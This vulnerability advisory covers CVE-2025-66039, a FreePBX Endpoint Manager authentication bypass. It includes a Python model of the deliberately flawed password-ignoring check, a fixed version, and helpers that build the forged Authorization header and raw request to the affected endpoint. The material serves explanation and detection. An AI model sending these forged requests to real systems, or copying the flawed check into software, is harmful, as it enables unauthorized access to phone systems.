PT-2025-50274 · FreePBX · FreePBX Endpoint Manager

Published 2025-12-09 · Updated 2026-03-19 · CVE-2025-66039

CVSS v2.0: 10 · Critical · AV:N/AC:L/Au:N/C:C/I:C/A:C
Name of the Vulnerable Software and Affected Versions

FreePBX Endpoint Manager versions 16.0.0 through 16.0.43
FreePBX Endpoint Manager versions 17.0.0 through 17.0.22
Description

The FreePBX Endpoint Manager module contains a flaw in its authentication handling when the FreePBX authentication type is set to "webserver". Incoming requests are verified incorrectly: an attacker can bypass authentication by supplying a valid username in the HTTP Authorization header, regardless of the password. The vulnerability can be exploited by sending a crafted HTTP request to the /admin/config.php?display=epm_advanced&view=settings endpoint with a forged Authorization header; the username in the header must be valid, but the password can be arbitrary. Successful exploitation grants unauthorized access to the system and, when chained with other flaws, can lead to SQL injection and remote code execution.
Recommendations

FreePBX Endpoint Manager versions 16.0.0 through 16.0.43: update to version 16.0.44 or later.
FreePBX Endpoint Manager versions 17.0.0 through 17.0.22: update to version 17.0.23 or later.
As a temporary measure, disable the "webserver" authentication type if it is not required.
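The bypass described above, modelled as an added example (this is illustrative code, not FreePBX's own): a miniature "webserver"-style Basic-auth check that accepts any request whose Authorization header names an existing user and ignores the password, beside a corrected check that verifies the password in constant time, plus helpers that build the crafted request to the affected endpoint and interpret the response of a probe sent with a valid username and a bogus password. The user store, the PBKDF2 hashing scheme and the EPM_PATH constant are assumptions for illustration; FreePBX stores and checks credentials differently.

```python
"""Model of the CVE-2025-66039 authentication flaw ("webserver" auth type).

Added example, not FreePBX code: it re-implements the check the advisory
describes in miniature so the bypass and its fix can be compared side by side.
"""
import base64
import hashlib
import hmac
from typing import Optional

_SALT = b"example-salt"          # assumption: fixed salt keeps the demo short
_ITERATIONS = 10_000


def _hash(password: str, salt: bytes = _SALT) -> bytes:
    """PBKDF2-SHA256 of a password (assumed scheme, not FreePBX's)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


# Constructed sample user store: username -> password hash.
USERS = {"admin": _hash("correct horse battery staple")}

# Affected endpoint named in the advisory.
EPM_PATH = "/admin/config.php?display=epm_advanced&view=settings"


def parse_basic_auth(header: Optional[str]) -> Optional[tuple[str, str]]:
    """Decode 'Authorization: Basic base64(user:pass)'; None if malformed."""
    if not header or not header.startswith("Basic "):
        return None
    try:
        raw = base64.b64decode(header[6:], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None
    user, _, password = raw.partition(":")
    return user, password


def vulnerable_webserver_auth(header: Optional[str]) -> bool:
    """Flawed check: trusts any username that exists and never looks at the password."""
    creds = parse_basic_auth(header)
    if creds is None:
        return False
    user, _ = creds
    return user in USERS


def fixed_webserver_auth(header: Optional[str]) -> bool:
    """Hardened check: the user must exist AND the password must verify."""
    creds = parse_basic_auth(header)
    if creds is None:
        return False
    user, password = creds
    stored = USERS.get(user)
    if stored is None:
        _hash(password)            # burn the same work so unknown users are not faster
        return False
    return hmac.compare_digest(_hash(password), stored)


def forged_header(user: str, password: str = "anything") -> str:
    """The forged Authorization header: valid username, arbitrary password."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def probe_request(host: str, user: str) -> bytes:
    """Raw HTTP/1.1 request to the affected endpoint carrying the forged header."""
    return (
        f"GET {EPM_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Authorization: {forged_header(user)}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def classify_probe(status_for_wrong_password: int) -> str:
    """Interpret the status code returned for a valid user with a bogus password."""
    if status_for_wrong_password == 200:
        return "vulnerable"
    if status_for_wrong_password in (401, 403):
        return "not vulnerable"
    return "inconclusive"


if __name__ == "__main__":
    hdr = forged_header("admin", "wrong-password")
    print("vulnerable check accepts:", vulnerable_webserver_auth(hdr))
    print("fixed check accepts:     ", fixed_webserver_auth(hdr))
    print(probe_request("pbx.example.internal", "admin").decode())
```

Running the module prints that the flawed check accepts the forged header while the fixed one rejects it; the probe_request output is the shape of request a scanner would send, and classify_probe turns the server's status code into a verdict (a 200 for a wrong password means the host is still unpatched).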

Exploit · Fix · RCE · Improper Authentication

Weakness Enumeration

Related Identifiers

BDU:2025-15989
CVE-2025-66039
GHSA-9JVH-MV6X-W698

Affected Products

FreePBX Endpoint Manager